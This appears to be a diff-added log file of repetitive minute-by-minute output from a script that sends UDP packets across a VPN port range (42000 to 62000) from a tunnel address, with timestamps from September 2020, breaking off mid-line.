+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:00:05 +Starting port fill at 2020-09-06 05:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:01:05 +Starting port fill at 2020-09-06 05:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:02:05 +Starting port fill at 2020-09-06 05:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:03:05 +Starting port fill at 2020-09-06 05:04:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:04:05 +Starting port fill at 2020-09-06 05:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:05:05 +Starting port fill at 2020-09-06 05:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:06:05 +Starting port fill at 2020-09-06 05:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:07:04 +Starting port fill at 2020-09-06 05:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:08:04 +Starting port fill at 2020-09-06 05:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:09:04 +Starting port fill at 2020-09-06 05:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:10:04 +Starting port fill at 2020-09-06 05:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:11:04 +Starting port fill at 2020-09-06 05:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:12:05 +Starting port fill at 2020-09-06 05:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:13:05 +Starting port fill at 2020-09-06 05:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:14:04 +Starting port fill at 2020-09-06 05:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:15:07 +Starting port fill at 2020-09-06 05:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:16:04 +Starting port fill at 2020-09-06 05:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:17:05 +Starting port fill at 2020-09-06 05:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:18:07 +Starting port fill at 2020-09-06 05:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:19:07 +Starting port fill at 2020-09-06 05:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:20:05 +Starting port fill at 2020-09-06 05:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:21:05 +Starting port fill at 2020-09-06 05:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 